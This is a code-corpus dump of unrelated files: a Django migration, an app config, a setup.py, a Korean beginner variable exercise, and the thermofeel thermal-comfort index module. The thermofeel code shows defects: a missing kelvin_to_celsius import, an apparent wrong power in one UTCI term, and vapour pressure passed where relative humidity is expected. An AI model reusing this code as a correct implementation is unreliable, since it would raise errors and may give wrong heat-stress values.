phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-04-09 16:30
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('phone_auth', '0007_auto_20210409_2145'),
]
operations = [
migrations.AlterField(
model_name='emailaddress',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='phonenumber',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 29.703704
| 110
| 0.663342
|
4a0a3b2840633965b1b56e52135ea33121d4d798
| 54
|
py
|
Python
|
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | null | null | null |
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | 40
|
2022-03-06T19:46:07.000Z
|
2022-03-27T11:50:02.000Z
|
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | 1
|
2022-03-29T08:53:21.000Z
|
2022-03-29T08:53:21.000Z
|
default_app_config = 'joladnijo.apps.JoladnijoConfig'
| 27
| 53
| 0.851852
|
4a0a3b6400096b01ad12c7a70f707572d5e23e1d
| 739
|
py
|
Python
|
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | 1
|
2018-05-13T05:39:52.000Z
|
2018-05-13T05:39:52.000Z
|
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Learn more: https://github.com/kennethreitz/setup.py
from setuptools import setup, find_packages
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='stockinfo',
version='0.1.0',
description='Notifying N225 and USD/JPN through LINE notify',
long_description=readme,
author='hibikisan2018',
author_email='hibikisan2010@gmail.com',
install_requires=['requests', 'bs4'],
url='https://github.com/hibikisan2018',
license=license,
packages=find_packages(exclude=('tests', 'docs')),
entry_points = {
'console_scripts':[
'stockinfo = stockinfo.sendLineMessage2:main',
],
},
)
| 23.09375
| 65
| 0.644114
|
4a0a3d582033bfd86290c3077ac9afa5589a4fb1
| 120
|
py
|
Python
|
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# 개념
# 변수란 어떠한 값을 담는 상자입니다.
# 규칙
# 변수_이름 = 저장할_값
과일상자 = "과일"
숫자상자 = 1
print(과일상자)
print(숫자상자)
| 9.230769
| 22
| 0.566667
|
4a0a3d727541b2855a1862bd07e7c3e796ebc070
| 28,816
|
py
|
Python
|
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
"""
thermofeel is a library to calculate human thermal comfort indexes.
Currently calculates the thermal indexes:
* Universal Thermal Climate Index
* Mean Radiant Temperature
* Mean Radiant Temperature from Wet Bulb Globe Temperature
* Heat Index Simplified
* Heat Index Adjusted
* Humidex
* Apparent Temperature
* Wind Chill
* Normal Effective Temperature (NET)
In support of the above indexes, it also calculates:
* Solar Declination Angle
* Solar Zenith Angle
* Relative Humidity Percentage
* Saturation vapour pressure
* Wet Bulb Globe Temperature Simple
* Wet Bulb Globe Temperature
"""
import math
import numpy as np
from .helpers import (
__wrap,
fahrenheit_to_celsius,
kelvin_to_fahrenheit,
kPa_to_hPa,
to_julian_date,
to_radians,
)
# solar declination angle [degrees] + time correction for solar angle
def solar_declination_angle(jd, h):
g = (360 / 365.25) * (jd + (h / 24)) # fractional year g in degrees
while g > 360:
g = g - 360
grad = g * to_radians
# declination in [degrees]
d = (
0.396372
- 22.91327 * math.cos(grad)
+ 4.025430 * math.sin(grad)
- 0.387205 * math.cos(2 * grad)
+ 0.051967 * math.sin(2 * grad)
- 0.154527 * math.cos(3 * grad)
+ 0.084798 * math.sin(3 * grad)
)
# time correction in [ h.degrees ]
tc = (
0.004297
+ 0.107029 * math.cos(grad)
- 1.837877 * math.sin(grad)
- 0.837378 * math.cos(2 * grad)
- 2.340475 * math.sin(2 * grad)
)
return d, tc
def calculate_relative_humidity_percent(t2m, td):
"""
Calculate relative humidity in percent
:param t2m: (float array) 2m temperature [K]
:param td: (float array) dew point temperature [K]
returns relative humidity [%]
"""
t2m = __wrap(t2m)
td = __wrap(td)
t2m = kelvin_to_celsius(t2m)
td = kelvin_to_celsius(td)
# saturated vapour pressure
es = 6.11 * 10.0 ** (7.5 * t2m / (237.3 + t2m))
# vapour pressure
e = 6.11 * 10.0 ** (7.5 * td / (237.3 + td))
rh = (e / es) * 100
return rh
def calculate_saturation_vapour_pressure(t2m):
"""
Calculate saturation vapour pressure over water
:param t2m: (float array) 2m temperature [K]
returns relative humidity [hPa]
http://www.thunderscientific.com/tech_info/reflibrary/its90formulas.pdf
"""
tk = __wrap(t2m)
g = [
-2.8365744e3,
-6.028076559e3,
1.954263612e1,
-2.737830188e-2,
1.6261698e-5,
7.0229056e-10,
-1.8680009e-13,
2.7150305,
]
ess = g[7] * np.log(tk)
for i in range(7):
ess += g[i] * np.power(tk, (i - 2))
ess = np.exp(ess) * 0.01 # hPa
return ess
def calculate_cos_solar_zenith_angle(h, lat, lon, y, m, d):
"""
calculate solar zenith angle
:param lat: (float array) latitude [degrees]
:param lon: (float array) longitude [degrees]
:param y: year [int]
:param m: month [int]
:param d: day [int]
:param h: hour [int]
https://agupubs.onlinelibrary.wiley.com/doi/epdf/10.1002/2015GL066868
see also:
http://answers.google.com/answers/threadview/id/782886.html
returns cosine of the solar zenith angle
"""
# convert to julian days counting from the beginning of the year
jd_ = to_julian_date(d, m, y) # julian date of data
jd11_ = to_julian_date(1, 1, y) # julian date 1st Jan
jd = jd_ - jd11_ + 1 # days since start of year
# declination angle + time correction for solar angle
d, tc = solar_declination_angle(jd, h)
drad = d * to_radians
latrad = lat * to_radians
sindec_sinlat = np.sin(drad) * np.sin(latrad)
cosdec_coslat = np.cos(drad) * np.cos(latrad)
# solar hour angle [h.deg]
sharad = ((h - 12) * 15 + lon + tc) * to_radians
csza = sindec_sinlat + cosdec_coslat * np.cos(sharad)
return np.clip(csza, 0, None)
def calculate_cos_solar_zenith_angle_integrated(
lat, lon, y, m, d, h, tbegin, tend, intervals_per_hour=1, integration_order=3
):
"""
calculate average of solar zenith angle based on numerical integration using 3 point gauss integration rule
:param lat: (int array) latitude [degrees]
:param lon: (int array) longitude [degrees]
:param y: year [int]
:param m: month [int]
:param d: day [int]
:param h: hour [int]
:param tbegin: offset in hours from forecast time to begin of time interval for integration [int]
:param tend: offset in hours from forecast time to end of time interval for integration [int]
:param integration order: order of gauss integration [int] valid = (1, 2, 3, 4)
:param intervals_per_hour: number of time intregrations per hour [int]
https://agupubs.onlinelibrary.wiley.com/doi/epdf/10.1002/2015GL066868
This uses Gaussian numerical integration. See https://en.wikipedia.org/wiki/Gaussian_quadrature
returns average of cosine of the solar zenith angle during interval [degrees]
"""
# Gauss-Integration coefficients
if integration_order == 3: # default, good speed and accuracy (3 points)
E = np.array([-math.sqrt(3.0 / 5.0), 0.0, math.sqrt(3.0 / 5.0)])
W = np.array([5.0 / 9.0, 8.0 / 9.0, 5.0 / 9.0])
else:
if integration_order == 1: # fastest, worse accuracy (1 point)
E = np.array([0.0])
W = np.array([2.0])
else:
if integration_order == 2: # faster, less accurate (2 points)
E = np.array([-1.0 / math.sqrt(3.0), 1.0 / math.sqrt(3.0)])
W = np.array([1.0, 1.0])
else:
if integration_order == 4: # slower, more accurate (4 points)
E = np.array(
[
-math.sqrt(3.0 / 7.0 + 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
-math.sqrt(3.0 / 7.0 - 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
math.sqrt(3.0 / 7.0 - 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
math.sqrt(3.0 / 7.0 + 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
]
)
W = np.array(
[
(18 - math.sqrt(30)) / 36,
(18 + math.sqrt(30)) / 36,
(18 + math.sqrt(30)) / 36,
(18 - math.sqrt(30)) / 36,
]
)
else:
print(f"Invalid integration_order {integration_order}")
raise ValueError
assert intervals_per_hour > 0
nsplits = (tend - tbegin) * intervals_per_hour
assert nsplits > 0
time_steps = np.linspace(tbegin, tend, num=nsplits + 1)
integral = np.zeros_like(lat)
for s in range(len(time_steps) - 1):
ti = time_steps[s]
tf = time_steps[s + 1]
# print(f"Interval {s+1} [{ti}, {tf}]")
deltat = tf - ti
jacob = deltat / 2.0
w = jacob * W
w /= tend - tbegin # average of integral
t = jacob * E
t += (tf + ti) / 2.0
# print(f"w {w}")
# print(f"t {t}")
for n in range(len(w)):
cossza = calculate_cos_solar_zenith_angle(
lat=lat, lon=lon, y=y, m=m, d=d, h=(h + t[n])
)
integral += w[n] * cossza
# integral /= (tend - tbegin) # average is above for efficiency
return integral
def calculate_mean_radiant_temperature(ssrd, ssr, fdir, strd, strr, cossza):
"""
mrt - Mean Radiant Temperature
:param ssrd: is surface solar radiation downwards [J/m^-2]
:param ssr: is surface net solar radiation [J/m^-2]
:param fdir: is Total sky direct solar radiation at surface [J/m^-2]
:param strd: is Surface thermal radiation downwards [J/m^-2]
:param strr: is Surface net thermal radiation [J/m^-2]
:param cossza: is cosine of solar zenith angle [degrees]
returns Mean Radiant Temperature [K]
"""
dsw = ssrd - fdir
rsw = ssrd - ssr
lur = strd - strr
# calculate fp projected factor area
gamma = np.arcsin(cossza) * 180 / np.pi
fp = 0.308 * np.cos(to_radians * gamma * 0.998 - (gamma * gamma / 50000))
# filter statement for solar zenith angle
csza_filter1 = np.where((cossza > 0.01))
# print(csza_filter1)
fdir[csza_filter1] = fdir[csza_filter1] / cossza[csza_filter1]
# calculate mean radiant temperature
mrt = np.power(
(
(1 / 0.0000000567)
* (
0.5 * strd
+ 0.5 * lur
+ (0.7 / 0.97) * (0.5 * dsw + 0.5 * rsw + fp * fdir)
)
),
0.25,
)
return mrt
def calculate_utci(t2_k, va_ms, mrt_k, e_hPa=None, td_k=None):
"""
UTCI
:param t2_k: (float array) is 2m temperature [K]
:param va_ms: (float array) is wind speed at 10 meters [m/s]
:param mrt_k:(float array) is mean radiant temperature [K]
:param e_hPa: (float array) is water vapour pressure [hPa]
:param td_k: (float array) is 2m dew point temperature [K]
Calculate UTCI with a 6th order polynomial approximation according to:
Brode, P. et al. Deriving the operational procedure for the
Universal Thermal Climate Index (UTCI). Int J Biometeorol (2012) 56: 48.1
returns UTCI [°C]
"""
t2 = __wrap(t2_k)
va = __wrap(va_ms)
mrt_kw = __wrap(mrt_k)
if e_hPa is not None:
ehPa = __wrap(e_hPa)
rh = ehPa / 10.0 # rh in kPa
else:
if td_k is not None:
t2d = __wrap(td_k)
rh_pc = calculate_relative_humidity_percent(t2, t2d)
ehPa = calculate_saturation_vapour_pressure(t2) * rh_pc / 100.0
rh = ehPa / 10.0 # rh in kPa
else:
raise ValueError("Missing input e_hPa or td_k")
t2m = kelvin_to_celsius(t2) # polynomial approx. is in Celsius
mrt = kelvin_to_celsius(mrt_kw) # polynomial approx. is in Celsius
e_mrt = np.subtract(mrt, t2m)
t2m2 = t2m * t2m
t2m3 = t2m2 * t2m
t2m4 = t2m3 * t2m
t2m5 = t2m4 * t2m
t2m6 = t2m5 * t2m
va2 = va * va
va3 = va2 * va
va4 = va3 * va
va5 = va4 * va
va6 = va5 * va
e_mrt2 = e_mrt * e_mrt
e_mrt3 = e_mrt2 * e_mrt
e_mrt4 = e_mrt3 * e_mrt
e_mrt5 = e_mrt4 * e_mrt
e_mrt6 = e_mrt5 * e_mrt
rh2 = rh * rh
rh3 = rh2 * rh
rh4 = rh3 * rh
rh5 = rh4 * rh
rh6 = rh5 * rh
utci = (
t2m
+ 6.07562052e-01
+ -2.27712343e-02 * t2m
+ 8.06470249e-04 * t2m2
+ -1.54271372e-04 * t2m3
+ -3.24651735e-06 * t2m4
+ 7.32602852e-08 * t2m5
+ 1.35959073e-09 * t2m6
+ -2.25836520e00 * va
+ 8.80326035e-02 * t2m * va
+ 2.16844454e-03 * t2m2 * va
+ -1.53347087e-05 * t2m3 * va
+ -5.72983704e-07 * t2m4 * va
+ -2.55090145e-09 * t2m5 * va
+ -7.51269505e-01 * va2
+ -4.08350271e-03 * t2m * va2
+ -5.21670675e-05 * t2m2 * va2
+ 1.94544667e-06 * t2m3 * va2
+ 1.14099531e-08 * t2m4 * va2
+ 1.58137256e-01 * va3
+ -6.57263143e-05 * t2m * va3
+ 2.22697524e-07 * t2m2 * va3
+ -4.16117031e-08 * t2m3 * va3
+ -1.27762753e-02 * va4
+ 9.66891875e-06 * t2m * va4
+ 2.52785852e-09 * t2m2 * va4
+ 4.56306672e-04 * va5
+ -1.74202546e-07 * t2m * va5
+ -5.91491269e-06 * va6
+ 3.98374029e-01 * e_mrt
+ 1.83945314e-04 * t2m * e_mrt
+ -1.73754510e-04 * t2m2 * e_mrt
+ -7.60781159e-07 * t2m3 * e_mrt
+ 3.77830287e-08 * t2m4 * e_mrt
+ 5.43079673e-10 * t2m5 * e_mrt
+ -2.00518269e-02 * va * e_mrt
+ 8.92859837e-04 * t2m * va * e_mrt
+ 3.45433048e-06 * t2m2 * va * e_mrt
+ -3.77925774e-07 * t2m3 * va * e_mrt
+ -1.69699377e-09 * t2m4 * va * e_mrt
+ 1.69992415e-04 * va2 * e_mrt
+ -4.99204314e-05 * t2m * va2 * e_mrt
+ 2.47417178e-07 * t2m2 * va2 * e_mrt
+ 1.07596466e-08 * t2m3 * va2 * e_mrt
+ 8.49242932e-05 * va3 * e_mrt
+ 1.35191328e-06 * t2m * va3 * e_mrt
+ -6.21531254e-09 * t2m2 * va3 * e_mrt
+ -4.99410301e-06 * va4 * e_mrt
+ -1.89489258e-08 * t2m * va4 * e_mrt
+ 8.15300114e-08 * va5 * e_mrt
+ 7.55043090e-04 * e_mrt2
+ -5.65095215e-05 * t2m * e_mrt2
+ -4.52166564e-07 * t2m * e_mrt2
+ 2.46688878e-08 * t2m3 * e_mrt2
+ 2.42674348e-10 * t2m4 * e_mrt2
+ 1.54547250e-04 * va * e_mrt2
+ 5.24110970e-06 * t2m * va * e_mrt2
+ -8.75874982e-08 * t2m2 * va * e_mrt2
+ -1.50743064e-09 * t2m3 * va * e_mrt2
+ -1.56236307e-05 * va2 * e_mrt2
+ -1.33895614e-07 * t2m * va2 * e_mrt2
+ 2.49709824e-09 * t2m2 * va2 * e_mrt2
+ 6.51711721e-07 * va3 * e_mrt2
+ 1.94960053e-09 * t2m * va3 * e_mrt2
+ -1.00361113e-08 * va4 * e_mrt2
+ -1.21206673e-05 * e_mrt3
+ -2.18203660e-07 * t2m * e_mrt3
+ 7.51269482e-09 * t2m2 * e_mrt3
+ 9.79063848e-11 * t2m3 * e_mrt3
+ 1.25006734e-06 * va * e_mrt3
+ -1.81584736e-09 * t2m * va * e_mrt3
+ -3.52197671e-10 * t2m2 * va * e_mrt3
+ -3.36514630e-08 * va2 * e_mrt3
+ 1.35908359e-10 * t2m * va2 * e_mrt3
+ 4.17032620e-10 * va3 * e_mrt3
+ -1.30369025e-09 * e_mrt4
+ 4.13908461e-10 * t2m * e_mrt4
+ 9.22652254e-12 * t2m2 * e_mrt4
+ -5.08220384e-09 * va * e_mrt4
+ -2.24730961e-11 * t2m * va * e_mrt4
+ 1.17139133e-10 * va2 * e_mrt4
+ 6.62154879e-10 * e_mrt5
+ 4.03863260e-13 * t2m * e_mrt5
+ 1.95087203e-12 * va * e_mrt5
+ -4.73602469e-12 * e_mrt6
+ 5.12733497e00 * rh
+ -3.12788561e-01 * t2m * rh
+ -1.96701861e-02 * t2m2 * rh
+ 9.99690870e-04 * t2m3 * rh
+ 9.51738512e-06 * t2m4 * rh
+ -4.66426341e-07 * t2m5 * rh
+ 5.48050612e-01 * va * rh
+ -3.30552823e-03 * t2m * va * rh
+ -1.64119440e-03 * t2m2 * va * rh
+ -5.16670694e-06 * t2m3 * va * rh
+ 9.52692432e-07 * t2m4 * va * rh
+ -4.29223622e-02 * va2 * rh
+ 5.00845667e-03 * t2m * va2 * rh
+ 1.00601257e-06 * t2m2 * va2 * rh
+ -1.81748644e-06 * t2m3 * va2 * rh
+ -1.25813502e-03 * va3 * rh
+ -1.79330391e-04 * t2m * va3 * rh
+ 2.34994441e-06 * t2m2 * va3 * rh
+ 1.29735808e-04 * va4 * rh
+ 1.29064870e-06 * t2m * va4 * rh
+ -2.28558686e-06 * va5 * rh
+ -3.69476348e-02 * e_mrt * rh
+ 1.62325322e-03 * t2m * e_mrt * rh
+ -3.14279680e-05 * t2m2 * e_mrt * rh
+ 2.59835559e-06 * t2m3 * e_mrt * rh
+ -4.77136523e-08 * t2m4 * e_mrt * rh
+ 8.64203390e-03 * va * e_mrt * rh
+ -6.87405181e-04 * t2m * va * e_mrt * rh
+ -9.13863872e-06 * t2m2 * va * e_mrt * rh
+ 5.15916806e-07 * t2m3 * va * e_mrt * rh
+ -3.59217476e-05 * va2 * e_mrt * rh
+ 3.28696511e-05 * t2m * va2 * e_mrt * rh
+ -7.10542454e-07 * t2m2 * va2 * e_mrt * rh
+ -1.24382300e-05 * va3 * e_mrt * rh
+ -7.38584400e-09 * t2m * va3 * e_mrt * rh
+ 2.20609296e-07 * va4 * e_mrt * rh
+ -7.32469180e-04 * e_mrt2 * rh
+ -1.87381964e-05 * t2m * e_mrt2 * rh
+ 4.80925239e-06 * t2m2 * e_mrt2 * rh
+ -8.75492040e-08 * t2m3 * e_mrt2 * rh
+ 2.77862930e-05 * va * e_mrt2 * rh
+ -5.06004592e-06 * t2m * va * e_mrt2 * rh
+ 1.14325367e-07 * t2m2 * va * e_mrt2 * rh
+ 2.53016723e-06 * va2 * e_mrt2 * rh
+ -1.72857035e-08 * t2m * va2 * e_mrt2 * rh
+ -3.95079398e-08 * va3 * e_mrt2 * rh
+ -3.59413173e-07 * e_mrt3 * rh
+ 7.04388046e-07 * t2m * e_mrt3 * rh
+ -1.89309167e-08 * t2m2 * e_mrt3 * rh
+ -4.79768731e-07 * va * e_mrt3 * rh
+ 7.96079978e-09 * t2m * va * e_mrt3 * rh
+ 1.62897058e-09 * va2 * e_mrt3 * rh
+ 3.94367674e-08 * e_mrt4 * rh
+ -1.18566247e-09 * t2m * e_mrt4 * rh
+ 3.34678041e-10 * va * e_mrt4 * rh
+ -1.15606447e-10 * e_mrt5 * rh
+ -2.80626406e00 * rh2
+ 5.48712484e-01 * t2m * rh2
+ -3.99428410e-03 * t2m2 * rh2
+ -9.54009191e-04 * t2m3 * rh2
+ 1.93090978e-05 * t2m4 * rh2
+ -3.08806365e-01 * va * rh2
+ 1.16952364e-02 * t2m * va * rh2
+ 4.95271903e-04 * t2m2 * va * rh2
+ -1.90710882e-05 * t2m3 * va * rh2
+ 2.10787756e-03 * va2 * rh2
+ -6.98445738e-04 * t2m * va2 * rh2
+ 2.30109073e-05 * t2m2 * va2 * rh2
+ 4.17856590e-04 * va3 * rh2
+ -1.27043871e-05 * t2m * va3 * rh2
+ -3.04620472e-06 * va4 * rh2
+ 5.14507424e-02 * e_mrt * rh2
+ -4.32510997e-03 * t2m * e_mrt * rh2
+ 8.99281156e-05 * t2m2 * e_mrt * rh2
+ -7.14663943e-07 * t2m3 * e_mrt * rh2
+ -2.66016305e-04 * va * e_mrt * rh2
+ 2.63789586e-04 * t2m * va * e_mrt * rh2
+ -7.01199003e-06 * t2m2 * va * e_mrt * rh2
+ -1.06823306e-04 * va2 * e_mrt * rh2
+ 3.61341136e-06 * t2m * va2 * e_mrt * rh2
+ 2.29748967e-07 * va3 * e_mrt * rh2
+ 3.04788893e-04 * e_mrt2 * rh2
+ -6.42070836e-05 * t2m * e_mrt2 * rh2
+ 1.16257971e-06 * t2m2 * e_mrt2 * rh2
+ 7.68023384e-06 * va * e_mrt2 * rh2
+ -5.47446896e-07 * t2m * va * e_mrt2 * rh2
+ -3.59937910e-08 * va2 * e_mrt2 * rh2
+ -4.36497725e-06 * e_mrt3 * rh2
+ 1.68737969e-07 * t2m * e_mrt3 * rh2
+ 2.67489271e-08 * va * e_mrt3 * rh2
+ 3.23926897e-09 * e_mrt4 * rh2
+ -3.53874123e-02 * rh3
+ -2.21201190e-01 * t2m * rh3
+ 1.55126038e-02 * t2m2 * rh3
+ -2.63917279e-04 * t2m3 * rh3
+ 4.53433455e-02 * va * rh3
+ -4.32943862e-03 * t2m * va * rh3
+ 1.45389826e-04 * t2m2 * va * rh3
+ 2.17508610e-04 * va2 * rh3
+ -6.66724702e-05 * t2m * va2 * rh3
+ 3.33217140e-05 * va3 * rh3
+ -2.26921615e-03 * e_mrt * rh3
+ 3.80261982e-04 * t2m * e_mrt * rh3
+ -5.45314314e-09 * t2m2 * e_mrt * rh3
+ -7.96355448e-04 * va * e_mrt * rh3
+ 2.53458034e-05 * t2m * va * e_mrt * rh3
+ -6.31223658e-06 * va2 * e_mrt * rh3
+ 3.02122035e-04 * e_mrt2 * rh3
+ -4.77403547e-06 * t2m * e_mrt2 * rh3
+ 1.73825715e-06 * va * e_mrt2 * rh3
+ -4.09087898e-07 * e_mrt3 * rh3
+ 6.14155345e-01 * rh4
+ -6.16755931e-02 * t2m * rh4
+ 1.33374846e-03 * t2m2 * rh4
+ 3.55375387e-03 * va * rh4
+ -5.13027851e-04 * t2m * va * rh4
+ 1.02449757e-04 * va2 * rh4
+ -1.48526421e-03 * e_mrt * rh4
+ -4.11469183e-05 * t2m * e_mrt * rh4
+ -6.80434415e-06 * va * e_mrt * rh4
+ -9.77675906e-06 * e_mrt2 * rh4
+ 8.82773108e-02 * rh5
+ -3.01859306e-03 * t2m * rh5
+ 1.04452989e-03 * va * rh5
+ 2.47090539e-04 * e_mrt * rh5
+ 1.48348065e-03 * rh6
)
# print(f"utci {utci}")
# utci_filtert2m = np.where(t2m >= 70)
# utci[utci_filtert2m] = -9999
# print(f"utci f1 {utci}")
# utci_filtert2m2 = np.where(t2m <= -70)
# utci[utci_filtert2m2] = -9999
# print(f"utci f2 {utci}")
# utci_filterva = np.where(17 <= va)
# utci[utci_filterva] = -9999
# print(f"utci f3 {utci}")
# utci_filterva2 = np.where(0 >= va)
# utci[utci_filterva2] = -9999
# print(f"utci f4 {utci}")
# utci_filterrh = np.where(5 < rh)
# utci[utci_filterrh] = -9999
# print(f"utci f5 {utci}")
# utci_filtere_mrt = np.where(e_mrt >= 100.0)
# utci[utci_filtere_mrt] = -9999
# print(f"utci f6 {utci}")
# utci_filtere_mrt2 = np.where(e_mrt <= -30)
# utci[utci_filtere_mrt2] = -9999
# print(f"utci f7 {utci}")
# print(f"utci {utci}")
return utci
def calculate_wbgts(t2m):
"""
wgbts - Wet Bulb Globe Temperature Simple
:param t2m: 2m temperature [K]
:param rh: relative humidity [pa]
https://link.springer.com/article/10.1007/s00484-011-0453-2
http://www.bom.gov.au/info/thermal_stress/#approximation
https://www.jstage.jst.go.jp/article/indhealth/50/4/50_MS1352/_pdf
returns Wet Bulb Globe Temperature [°C]
"""
t2m = __wrap(t2m)
rh = calculate_saturation_vapour_pressure(t2m)
rh = kPa_to_hPa(rh)
t2m = kelvin_to_celsius(t2m)
wbgts = 0.567 * t2m + 0.393 * rh + 3.38
return wbgts
def calculate_wbt(t_c, rh):
"""
calculate wet globe temperature
:param t2m: 2m temperature [°C]
:param rh: relative humidity percentage[%]
returns wet bulb temperature [°C]
"""
t_c = __wrap(t_c)
rh = __wrap(rh)
tw = (
t_c * np.arctan(0.151977 * np.sqrt(rh + 8.313659))
+ np.arctan(t_c + rh)
- np.arctan(rh - 1.676331)
+ 0.00391838 * (rh) ** (3 / 2) * np.arctan(0.023101 * rh)
- 4.686035
)
return tw
def calculate_bgt(t_k, mrt, va):
"""
calculate globe temperature
:param t2m: 2m temperature [K]
:param mrt: mean radiant temperature [K]
:param va: wind speed at 10 meters [m/s]
returns bulb globe temperature [°C]
"""
t_k = __wrap(t_k)
mrt = __wrap(mrt)
va = __wrap(va)
f = (1.1e8 * va ** 0.6) / (0.98 * 0.15 ** 0.4)
a = f / 2
b = -f * t_k - mrt ** 4
rt1 = 3 ** (1 / 3)
rt2 = np.sqrt(3) * np.sqrt(27 * a ** 4 - 16 * b ** 3) + 9 * a ** 2
rt3 = 2 * 2 ** (2 / 3) * b
a = a.clip(min=0)
bgt_quartic = -1 / 2 * np.sqrt(
rt3 / (rt1 * rt2 ** (1 / 3)) + (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
) + 1 / 2 * np.sqrt(
(4 * a)
/ np.sqrt(
rt3 / (rt1 * rt2 ** (1 / 3))
+ (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
)
- (2 ** (1 / 3) * rt2 ** (1 / 3)) / 3 ** (2 / 3)
- rt3 / (rt1 * rt2 ** (1 / 3))
)
bgt_c = kelvin_to_celsius(bgt_quartic)
return bgt_c
def calculate_wbgt(t_k, mrt, va, td):
"""
calculate wet bulb globe temperature
:param t_k: 2m temperature [K]
:param mrt: mean radiant temperature [K]
:param va: wind speed at 10 meters [m/s]
:param td: dew point temperature [°C]
returns wet bulb globe temperature [°C]
https://journals.ametsoc.org/view/journals/apme/50/11/jamc-d-11-0143.1.xml
"""
t_k = __wrap(t_k)
mrt = __wrap(mrt)
va = __wrap(va)
td = __wrap(td)
bgt_c = calculate_bgt(t_k, mrt, va)
rh = calculate_relative_humidity_percent(t_k, td)
t_c = kelvin_to_celsius(t_k)
tw_c = calculate_wbt(t_c, rh)
wbgt = 0.7 * tw_c + 0.2 * bgt_c + 0.1 * t_c
return wbgt
def calculate_mrt_from_bgt(t2m, bgt, va):
"""
calculate mean radiant temperature from wet bulb globe temperature
:param t2m: 2m temperature [K]
:param bgt: bulb globe temperature in Kelvin [K]
:param va: wind speed at 10 meters [m/s]
returns mean radiant temperature [K]
"""
t2m = __wrap(t2m)
bgt = __wrap(bgt)
va = __wrap(va)
f = (1.1e8 * va ** 0.6) / (0.98 * 0.15 ** 0.4)
bgt4 = bgt ** 4
mrtc = bgt4 + f * (bgt - t2m)
mrtc2 = np.sqrt(np.sqrt(mrtc))
return kelvin_to_celsius(mrtc2)
def calculate_humidex(t2m, td):
"""
humidex - heat index used by the Canadian Meteorological Service
:param t2m: 2m temperature [K]
:param td: dew point temperature [K]
returns humidex [°C]
"""
t2m = __wrap(t2m)
td = __wrap(td)
e = 6.11 * np.exp(5417.7530 * ((1 / t2m) - (1 / td)))
h = 0.5555 * (e - 10.0)
humidex = (t2m + h) - 273.15
return humidex
def calculate_net_effective_temperature(t2m, va, td):
"""
Net - Normal Effective Temperature used in Hong Kong, Poland and Germany
:param t2m: 2m temperature [K]
:param td: 2m dew point temperature [K]
:param rh: Relative Humidity [pa]
:param va: Wind speed at 10 meters [m/s]
returns net effective temperature [°C]
"""
rh = calculate_relative_humidity_percent(t2m, td)
t2m = __wrap(t2m)
va = __wrap(va)
rh = __wrap(rh)
t2m = kelvin_to_celsius(t2m)
rh = kPa_to_hPa(rh)
ditermeq = 1 / 1.76 + 1.4 * va ** 0.75
net = 37 - (37 - t2m / 0.68 - 0.0014 * rh + ditermeq) - 0.29 * t2m * (1 - 0.01 * rh)
return net
def calculate_apparent_temperature(t2m, va, rh=None):
"""
Apparent Temperature version without radiation
:param t2m: 2m Temperature [K]
:param rh: Relative Humidity [pa]
returns apparent temperature [K]
"""
if rh is None:
rh = calculate_saturation_vapour_pressure(t2m)
t2m = __wrap(t2m)
va = __wrap(va)
rh = __wrap(rh)
va = va * 4.87 / np.log10(67.8 * 10 - 5.42) # converting to 2m, ~1.2m wind speed
at = t2m + 0.33 * rh - 0.7 * va - 4
at = kelvin_to_celsius(at)
return at
